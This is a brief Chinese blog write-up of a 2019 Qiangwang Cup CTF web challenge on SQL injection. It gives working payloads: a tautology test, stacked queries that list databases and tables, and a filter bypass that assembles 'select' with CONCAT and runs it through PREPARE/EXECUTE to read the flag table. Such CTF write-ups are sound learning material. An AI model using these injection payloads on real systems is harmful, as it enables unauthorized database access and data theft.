Web-[强网杯 2019]随便注

打开题目：

应该是道sql注入题
先尝试payload:' or 1=1#

判断存在sql注入

查询数据库1';show databases#

查询表1';show tables#

查询字段,表名为数字时要用引号圈起来

1';select * from `1919810931114514`#

发现select被过滤了

设置payload:

?inject=-1';SET @sql = CONCAT('sel','ect',' * from `1919810931114514`;');PREPARE dawn from @sql;EXECUTE dawn;#

得到flag

posted @ 2021-11-08 17:04 Edan_m 阅读(29) 评论(0) 收藏举报

刷新页面返回顶部

Edan_m